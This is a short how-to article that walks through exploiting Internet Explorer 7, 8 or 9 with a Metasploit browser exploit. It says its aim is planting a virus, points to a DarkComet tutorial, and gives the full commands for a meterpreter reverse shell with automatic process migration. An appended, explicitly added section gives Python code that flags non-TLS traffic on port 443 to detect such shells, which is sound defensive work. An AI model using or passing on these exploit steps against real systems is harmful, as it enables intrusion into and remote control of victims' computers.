In this article we will share the process for exploiting Internet Explorer 7, 8 or 9. This exploit will allow you to plant a virus on the target computer.
What you need:
- A server or virus to send to the target. Refer to the DarkComet tutorial for an example of how to make one.
- Metasploit (comes with BackTrack; setup instructions can be found in this app).
Steps to exploit:
- Start up msfconsole, and enter the following commands: use exploit/windows/browser/ie_execommand_uaf
- set PAYLOAD windows/meterpreter/reverse_tcp (can be arbitrary; type show payloads to see what is available)
- The next 2 commands are only required for reverse payloads, and may be skipped otherwise.
- set LHOST 0.0.0.0 (Your IP address)
- set LPORT 443 (can be arbitrary)
- set SRVHOST 0.0.0.0 (can be an arbitrary IP to host the server on, if you have bind access; otherwise use your own address)
- set SRVPORT 80 (for direct HTTP, can be changed)
- set URIPATH / (can be arbitrary; this is the path after your IP, e.g. 0.0.0.0/mypath, and can be just / if they connect directly)
- set AutoRunScript migrate -f (used so that meterpreter moves out of the browser process, which can be closed)
- exploit (runs your server)
Follow these steps carefully and you can easily exploit IE.
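From the defender's side, the LPORT 443 setting above means the reverse connection shares a port with HTTPS. The added example below (not part of the original article) flags port-443 flows that do not open with a TLS ClientHello, assuming the reverse_tcp payload speaks raw TCP rather than TLS; the `Flow` record layout and the sample flows are constructed for illustration.

```python
from dataclasses import dataclass

TLS_HANDSHAKE = 0x16   # TLS record content type: handshake
CLIENT_HELLO = 0x01    # handshake message type: ClientHello

@dataclass
class Flow:            # hypothetical flow record, e.g. built from sensor output
    src: str
    dst: str
    dport: int
    first_speaker: str  # "client" or "server": who sent the first payload byte
    first_bytes: bytes  # first payload bytes sent by that speaker

def opens_with_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS record that carries a ClientHello."""
    if len(data) < 6:
        return False
    rec_len = int.from_bytes(data[3:5], "big")
    return (data[0] == TLS_HANDSHAKE and data[1] == 0x03 and data[2] <= 0x04
            and 0 < rec_len <= 16384 and data[5] == CLIENT_HELLO)

def suspicious_443(flows):
    """Return (flow, reason) pairs for port-443 flows that are not TLS."""
    hits = []
    for f in flows:
        if f.dport != 443:
            continue
        if f.first_speaker == "server":   # in TLS the client always speaks first
            hits.append((f, "server spoke first"))
        elif not opens_with_client_hello(f.first_bytes):
            hits.append((f, "client data is not a TLS ClientHello"))
    return hits

# Constructed sample flows (documentation address ranges, not real captures).
SAMPLE = [
    Flow("10.0.0.5", "192.0.2.10", 443, "client",
         bytes.fromhex("1603010200010001fc0303")),        # normal TLS opening
    Flow("10.0.0.7", "198.51.100.20", 443, "server",
         bytes.fromhex("000bab00")),                      # raw bytes, no TLS record
    Flow("10.0.0.8", "203.0.113.30", 443, "client", b"GET / HTTP/1.1\r\n"),
    Flow("10.0.0.9", "192.0.2.44", 80, "client", b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for flow, reason in suspicious_443(SAMPLE):
        print(f"{flow.src} -> {flow.dst}:{flow.dport}: {reason}")
```

A hit only means the flow is not TLS; other non-TLS services placed on port 443 will also match and need to be allowlisted.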